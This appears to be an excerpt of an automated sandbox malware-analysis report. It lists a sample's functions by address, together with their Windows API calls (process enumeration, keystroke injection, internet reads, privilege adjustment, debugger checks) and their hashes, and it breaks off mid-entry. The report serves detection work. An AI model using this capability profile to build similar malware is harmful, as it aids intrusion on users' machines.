                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($tb?$|
                        • API String ID: 1659193697-3876775998
                        • Opcode ID: 54ade3c8e066eb6be6e253be59b3ae2b0ae003116d341eae48e49cb4d0e5ef99
                        • Instruction ID: 19b434b85b6818954757c90e8d4a3b2e87b616321c5a0961e58d22a92e9f8d09
                        • Opcode Fuzzy Hash: 54ade3c8e066eb6be6e253be59b3ae2b0ae003116d341eae48e49cb4d0e5ef99
                        • Instruction Fuzzy Hash: 34323679A006059FCB29CF59C481A6AB7F0FF88710B15C46EE59ADB7A1EB70E941CB40
                        Function 003BA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003BA6AC
                        • Process32FirstW.KERNEL32(00000000,?), ref: 003BA6BA
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • Process32NextW.KERNEL32(00000000,?), ref: 003BA79C
                        • CloseHandle.KERNEL32(00000000), ref: 003BA7AB
                          • Part of subcall function 0034CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00373303,?), ref: 0034CE8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                        • String ID:
                        • API String ID: 1991900642-0
                        • Opcode ID: fdd48546a65eb95a308556c414628454fa6a2e3b231516e556af2e6cfed37f8d
                        • Instruction ID: 7048ec05c7541bc8f3ef34f6fd1d815a2bcdab33873b74f8d3527209a8f8e499
                        • Opcode Fuzzy Hash: fdd48546a65eb95a308556c414628454fa6a2e3b231516e556af2e6cfed37f8d
                        • Instruction Fuzzy Hash: 4B514C75508700AFD711EF25C886A6BBBE8FF89754F00891DF589DB261EB70E904CB92
                        Function 0039AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0039AAAC
                        • SetKeyboardState.USER32(00000080), ref: 0039AAC8
                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0039AB36
                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0039AB88
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
                        • Instruction ID: 3a30f7031821ea092ed3f1cc24f454f04d4cd3f1b9816adb6206d0b91777532a
                        • Opcode Fuzzy Hash: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
                        • Instruction Fuzzy Hash: 16313930A40A08AFFF37CB69CC05BFA7BAAAB45310F04431AF585961D0D7749981C7E2
                        Function 003ACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 003ACE89
                        • GetLastError.KERNEL32(?,00000000), ref: 003ACEEA
                        • SetEvent.KERNEL32(?,?,00000000), ref: 003ACEFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorEventFileInternetLastRead
                        • String ID:
                        • API String ID: 234945975-0
                        • Opcode ID: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
                        • Instruction ID: 846471081dff75d0e1203f9e704612a671f28718d053a83691fded423dc8a8bd
                        • Opcode Fuzzy Hash: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
                        • Instruction Fuzzy Hash: 5321BDB1510305AFEB22CF65C948FA677FCEB02355F10582EE646D2551EB70EE08CB90
                        Function 003A5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 003A5CC1
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A5D17
                        • FindClose.KERNEL32(?), ref: 003A5D5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 6abd67e4017969cde8b9ec8283c722d779a0e029e3fb4a2135e8edf214986ce9
                        • Instruction ID: 7f5a5bd4d1c107af27fbc7000110c3facabde792f11016e2fa7ac9e1b407d2ea
                        • Opcode Fuzzy Hash: 6abd67e4017969cde8b9ec8283c722d779a0e029e3fb4a2135e8edf214986ce9
                        • Instruction Fuzzy Hash: D4517674604A019FC716DF28C494E9AB7E4FF4A324F15855DE99A8B3A1CB30E905CF91
                        Function 00362622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0036271A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00362724
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00362731
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
                        • Instruction ID: 2ca9a34d2f398b57737d398b075726577ebed4bb580a4a943537b43efcaf787a
                        • Opcode Fuzzy Hash: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
                        • Instruction Fuzzy Hash: 5831D67491121C9BCB22DF64DC88BDDB7B8AF08310F5081EAE80CA7261E7349F858F54
                        Function 003A51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A51DA
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003A5238
                        • SetErrorMode.KERNEL32(00000000), ref: 003A52A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
                        • Instruction ID: 75f928f6152a403f2a0f7bc0adb3b284f1713daeb9fd204a3edb79d4b338f7c0
                        • Opcode Fuzzy Hash: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
                        • Instruction Fuzzy Hash: 82315A75A10508DFDB01DF54D884EADBBB4FF49314F088499E809AB362CB31E846CB90
                        Function 003916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
                          • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                        • GetLastError.KERNEL32 ref: 0039174A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                        • String ID:
                        • API String ID: 577356006-0
                        • Opcode ID: 8b70d2283dc36b637d41309b4134900ca7ce628b22d3225bf04ccc18e3aac080
                        • Instruction ID: 0deebe9c8d881015b913e5af9d5a556d6a2b5e1de37ef15fb0c3845e0d429959
                        • Opcode Fuzzy Hash: 8b70d2283dc36b637d41309b4134900ca7ce628b22d3225bf04ccc18e3aac080
                        • Instruction Fuzzy Hash: FD11BFB2810205AFE7199F54EC86D6AB7FDEF04714B24852EE05696241EB70FC418B20
                        Function 0039D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D608
                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0039D645
                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D650
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle
                        • String ID:
                        • API String ID: 33631002-0
                        • Opcode ID: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
                        • Instruction ID: 79cfc0ec1a97c7d93ffd90e208e935751d77f3705b3b2d058903051104dd0bd1
                        • Opcode Fuzzy Hash: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
                        • Instruction Fuzzy Hash: A711A175E01228BFDB118F95EC45FAFBFBCEB45B50F108115F908E7290C2705A018BA1
                        Function 00391663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0039168C
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003916A1
                        • FreeSid.ADVAPI32(?), ref: 003916B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
                        • Instruction ID: 4ba5c7f60f2a58d293f6a71a2878d68bf2faafe9ea32e2bf6cb027b93f617523
                        • Opcode Fuzzy Hash: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
                        • Instruction Fuzzy Hash: D4F0F4B1950309FBDF01DFE49C89EAEBBBCFB08704F504565E901E2181E774EA448B54
                        Function 00354CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D09
                        • TerminateProcess.KERNEL32(00000000,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D10
                        • ExitProcess.KERNEL32 ref: 00354D22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
                        • Instruction ID: 0765d98dee9a788d01b1a8da1390804827760c0da87ace476efdf78f757a6b39
                        • Opcode Fuzzy Hash: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
                        • Instruction Fuzzy Hash: DFE09231410188ABCB16AF54EE09E583BA9AB41786F159018FC098B133CB3AE986CB90
                        Function 0036C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: /
                        • API String ID: 0-2043925204
                        • Opcode ID: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
                        • Instruction ID: cb6919c20c520b5182a3ac5e288743cb954d780f89be4fd0a97b8e03b52f82ab
                        • Opcode Fuzzy Hash: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
                        • Instruction Fuzzy Hash: F64149769002196FCB21DFB9CC5CDBB7778EB84314F208669F945CB284E6709D41CB50
                        Function 0038D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 0038D28C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID: X64
                        • API String ID: 2645101109-893830106
                        • Opcode ID: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
                        • Instruction ID: 363d56b22d780909813bd55e568af4b2faaecc502cdb76d6a3c820b3b231020f
                        • Opcode Fuzzy Hash: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
                        • Instruction Fuzzy Hash: 8ED0C9B481112DEACB91DB90EC88DD9B3BCBB04305F100591F106E2440D730A5488F10
                        Function 0035CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction ID: f76c324b289243f8693f42b04ab4b297a4ecee824b769ca2411fc15330637f63
                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction Fuzzy Hash: F2022C71E102199FDF15CFA9C880AADFBF1EF48319F259169D819EB390D731AA45CB80
                        Function 0033CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable is not of type 'Object'.$p#@
                        • API String ID: 0-655357629
                        • Opcode ID: 68bad6a3ab810dbe1d972c829a46ea4ade5276aa0d5ad419dec76c49a2ecf872
                        • Instruction ID: de056fd003c6b108c66c28cd131e343256a9a302ac1dea53186fc0103097868c
                        • Opcode Fuzzy Hash: 68bad6a3ab810dbe1d972c829a46ea4ade5276aa0d5ad419dec76c49a2ecf872
                        • Instruction Fuzzy Hash: 1532AE34910218DBCF1AEF90C9C1AEDB7B9BF05304F1550A9E806BF292D775AE49CB50
                        Function 003A68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 003A6918
                        • FindClose.KERNEL32(00000000), ref: 003A6961
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
                        • Instruction ID: 2e1a02ba322a66087af522935cace89899ae4c91850f513adfc575a51bf61fab
                        • Opcode Fuzzy Hash: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
                        • Instruction Fuzzy Hash: 7311D0356142009FC711CF29C4C9A16BBE4FF89328F09C69DE4698F6A2CB30EC05CB90
                        Function 003A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37E4
                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
                        • Instruction ID: 15bcf667a97e9d6ffcfa69f812351a6d6ddffe552c7bf640785b202ce22031f9
                        • Opcode Fuzzy Hash: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
                        • Instruction Fuzzy Hash: 4DF0E5B16053286AEB2257669C4DFEB3AAEEFC5761F000265F509D2281D9A09904C7B0
                        Function 0039B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0039B25D
                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0039B270
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: InputSendkeybd_event
                        • String ID:
                        • API String ID: 3536248340-0
                        • Opcode ID: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
                        • Instruction ID: d03bd8d88810756b560ab416273272ea8ed65d5895f6c44b29fd36be6072136f
                        • Opcode Fuzzy Hash: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
                        • Instruction Fuzzy Hash: 73F06D7080424DABDF069FA0C805BAEBBB4FF04305F00840AF955E5192C37992019F94
                        Function 003910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
                        • CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
                        Memory Dump Source
